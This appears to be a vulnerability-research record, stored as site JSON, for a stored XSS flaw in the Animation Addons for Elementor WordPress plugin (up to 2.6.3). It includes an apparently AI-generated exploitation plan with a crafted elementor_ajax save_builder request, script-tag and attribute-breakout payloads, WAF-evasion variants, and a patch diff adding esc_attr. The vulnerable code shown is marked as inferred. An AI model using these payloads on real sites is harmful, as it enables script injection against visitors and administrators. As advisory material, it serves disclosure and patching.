[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fnuZ8Ev29iQEBfvQeNuHa3uIKuINZaU3ViGs_sj4e0vk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"WF-e2e755c7-7d1e-45f7-9d0b-2df1ef0bdd02-animation-addons-for-elementor","animation-addons-for-elementor-authenticated-contributor-stored-cross-site-scripting-via-weather-widget","Animation Addons for Elementor \u003C= 2.6.3 - Authenticated (Contributor+) Stored Cross-Site Scripting via Weather Widget","The Animation Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'weather_style' and 'move_direction' parameters of the Weather widget in all versions up to, and including, 2.6.3. This is due to insufficient output escaping in the Weather widget's render() function at widgets\u002Fweather.php:1246, where both settings values are placed into an HTML class attribute without esc_attr(). Elementor does not server-side validate widget SELECT control values against allowed options on save, so an authenticated attacker with Contributor-level access or above can submit a crafted save_builder AJAX request storing arbitrary values in the _elementor_data post meta. The stored payload renders unescaped on every frontend visit to the affected page (the Weather widget requires an OpenWeatherMap API key to reach the vulnerable output, which is the normal operational state for sites using this widget).","animation-addons-for-elementor",null,"\u003C=2.6.3","2.6.4","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-26 15:52:15","2026-05-26 16:07:51",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe2e755c7-7d1e-45f7-9d0b-2df1ef0bdd02?source=api-prod",0,[22,23,24,25,26,27,28,29],"animation-addons-for-elementor.php","assets\u002Fcss\u002Fwidgets\u002Floop-grid.css","assets\u002Fcss\u002Fwidgets\u002Floop-grid.min.css","assets\u002Fsrc\u002Fscss\u002Fwidgets\u002Floop-grid.scss","changelog.txt","class-plugin.php","config.php","inc\u002FAAE_Post_Handler_Trait.php","researched",false,3,"# Research Plan: Stored XSS via Weather Widget in Animation Addons for Elementor\n\n## 1. Vulnerability Summary\nThe **Animation Addons for Elementor** plugin (up to 2.6.3) contains a Stored Cross-Site Scripting (XSS) vulnerability in its Weather widget. The parameters `weather_style` and `move_direction` are reflected in the HTML output within a class attribute without proper sanitization or escaping via `esc_attr()`. While these values are typically selected from a predefined list in the Elementor editor, an authenticated user with Contributor-level access can bypass client-side restrictions and submit arbitrary strings (including script tags or attribute breakouts) via a direct Elementor `save_builder` AJAX request.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `elementor_ajax` (standard Elementor save mechanism)\n- **Vulnerable Parameters:** `weather_style` and `move_direction` within the `settings` object of the Weather widget in the `_elementor_data` payload.\n- **Authentication:** Authenticated, Contributor-level or higher (any role with `edit_posts` capability that can access the Elementor editor).\n- **Precondition:** The Weather widget must be rendered on the frontend. This requires an OpenWeatherMap API key to be configured in the plugin settings to reach the vulnerable code path in `widgets\u002Fweather.php`.\n\n## 3. Code Flow\n1. **Save Path:**\n   - A user edits a post\u002Fpage using Elementor.\n   - When saving, Elementor sends a POST request to `admin-ajax.php` with `action=elementor_ajax`.\n   - The payload contains a JSON string in the `actions` parameter, specifically within the `save_builder` action.\n   - The plugin stores the widget's settings (including `weather_style` and `move_direction`) into the `_elementor_data` post meta without validating that the \"select\" values match the allowed options.\n\n2. **Render Path (Sink):**\n   - File: `widgets\u002Fweather.php:1246` (inferred from description).\n   - Function: `render()`\n   - The code retrieves settings: `$settings = $this->get_settings_for_display();`\n   - The values of `$settings['weather_style']` and `$settings['move_direction']` are echoed directly into an HTML class attribute:\n     ```php\n     \u002F\u002F Representative logic at widgets\u002Fweather.php:1246\n     echo '\u003Cdiv class=\"aae-weather-container ' . $settings['weather_style'] . ' ' . $settings['move_direction'] . '\">';\n     ```\n   - Since no `esc_attr()` is used, an attacker can break out of the class attribute or the `div` tag entirely.\n\n## 4. Nonce Acquisition Strategy\nTo save Elementor data, a valid Elementor AJAX nonce is required.\n\n1. **Post Creation:** Use WP-CLI to create a page and enable Elementor for it.\n2. **Access Editor:** Use `browser_navigate` to go to the Elementor editor URL for that page: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fpost.php?post=POST_ID&action=elementor`.\n3. **Extract Nonce:** Use `browser_eval` to extract the nonce from the Elementor configuration object:\n   - Variable: `window.elementorConfig.ajax.nonce`\n   - Secondary Variable (Plugin specific): `window.WCF_Addons_Editor?._wpnonce` (from `class-plugin.php`) although the standard Elementor nonce is usually sufficient for `save_builder`.\n\n## 5. Exploitation Strategy\n1. **Admin Setup:**\n   - Set a dummy or valid OpenWeatherMap API key in the plugin's settings (usually stored in `options` table).\n2. **Contributor Login:** Authenticate as a Contributor user.\n3. **Capture Post Info:** Find a post ID the Contributor can edit.\n4. **Acquire Nonce:** Follow the strategy in Section 4.\n5. **Craft Payload:**\n   - We will inject into `weather_style`.\n   - Payload: `style-1\" onmouseover=\"alert(document.domain)\" data-x=\"` (Attribute Breakout)\n   - OR: `style-1\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>` (Tag Breakout)\n6. **Send Save Request:**\n   - Use `http_request` to send the `elementor_ajax` action.\n   - **Method:** POST\n   - **Body (URL Encoded):**\n     ```text\n     action=elementor_ajax\n     &_nonce=[ELEMENTOR_NONCE]\n     &actions={\"save_builder\":{\"action\":\"save_builder\",\"data\":{\"status\":\"publish\",\"elements\":[{\"id\":\"dummy-id\",\"elType\":\"widget\",\"widgetType\":\"wcf-weather\",\"settings\":{\"weather_style\":\"style-1\\\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\",\"move_direction\":\"left\"},\"elements\":[]}]}}}\n     &post_id=[POST_ID]\n     ```\n7. **Trigger XSS:** Navigate to the published page URL on the frontend.\n\n## 6. Test Data Setup\n- **OpenWeatherMap API Key:** Set via `wp option update aae_weather_api_key \"YOUR_KEY\"` (Verify the option name in the plugin settings source if possible; usually `aae_weather_api_key` or similar).\n- **Target Page:**\n  ```bash\n  wp post create --post_type=page --post_title=\"Weather Test\" --post_status=publish --post_author=[CONTRIBUTOR_ID]\n  ```\n- **Contributor User:**\n  ```bash\n  wp user create attacker attacker@example.com --role=contributor --user_pass=password\n  ```\n\n## 7. Expected Results\n- The `save_builder` request should return a `200 OK` with a JSON response indicating success (`{\"success\":true,...}`).\n- When viewing the page source of the created post, the output should look like:\n  `\u003Cdiv class=\"aae-weather-container style-1\">\u003Cscript>alert(document.domain)\u003C\u002Fscript> left\">`\n- The browser should execute the `alert()` when the page is loaded.\n\n## 8. Verification Steps\n1. **Database Check:**\n   ```bash\n   wp post meta get [POST_ID] _elementor_data\n   ```\n   Check if the JSON contains the string `\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n2. **Frontend Check:** Use `http_request` (GET) on the post URL and grep for the script tag.\n\n## 9. Alternative Approaches\n- **Move Direction Injection:** If `weather_style` is sanitized elsewhere, attempt the same payload in `move_direction`.\n- **Style Attribute Injection:** If script tags are blocked by a WAF or filter, use an attribute-based payload: `style-1\" onfocus=\"alert(1)\" autofocus=\"`.\n- **Editor-based XSS:** Check if the payload also executes within the Elementor Editor itself for the Contributor, which could lead to privilege escalation if an Admin later edits the same page. In the editor, the localization key `WCF_Addons_Editor._wpnonce` might be relevant for other plugin-specific AJAX actions.","The Animation Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) via the Weather widget's 'weather_style' and 'move_direction' parameters in versions up to 2.6.3. This occurs because the plugin fails to use esc_attr() when rendering these setting values into an HTML class attribute, allowing authenticated attackers with Contributor-level permissions to inject malicious scripts that execute in the context of site visitors.","\u002F* File: widgets\u002Fweather.php Line: 1246 (Inferred from description) *\u002F\n\n$settings = $this->get_settings_for_display();\n\n\u002F\u002F ... \n\necho '\u003Cdiv class=\"aae-weather-container ' . $settings['weather_style'] . ' ' . $settings['move_direction'] . '\">';","--- widgets\u002Fweather.php\n+++ widgets\u002Fweather.php\n@@ -1243,4 +1243,4 @@\n \n $settings = $this->get_settings_for_display();\n-echo '\u003Cdiv class=\"aae-weather-container ' . $settings['weather_style'] . ' ' . $settings['move_direction'] . '\">';\n+echo '\u003Cdiv class=\"aae-weather-container ' . esc_attr( $settings['weather_style'] ) . ' ' . esc_attr( $settings['move_direction'] ) . '\">';","1. Authenticate as a Contributor-level user or higher.\n2. Access a page editor to obtain a valid Elementor AJAX nonce from the window.elementorConfig.ajax.nonce JavaScript object.\n3. Identify the post_id for a post the attacker has permission to edit.\n4. Send an AJAX POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action 'elementor_ajax' and sub-action 'save_builder'.\n5. In the request payload, include a Weather widget ('wcf-weather') where the 'weather_style' or 'move_direction' settings contain an attribute-breaking payload like: style-1\" onmouseover=\"alert(document.domain)\" data-x=\"\n6. Ensure the site has an OpenWeatherMap API key configured (required for the Weather widget to render its output).\n7. Navigate to the frontend page where the widget is displayed; the payload will execute when a user interacts with or views the container div.","gemini-3-flash-preview","2026-06-04 19:23:13","2026-06-04 19:23:57",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","2.6.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanimation-addons-for-elementor\u002Ftags\u002F2.6.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fanimation-addons-for-elementor.2.6.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanimation-addons-for-elementor\u002Ftags\u002F2.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fanimation-addons-for-elementor.2.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanimation-addons-for-elementor\u002Ftags"]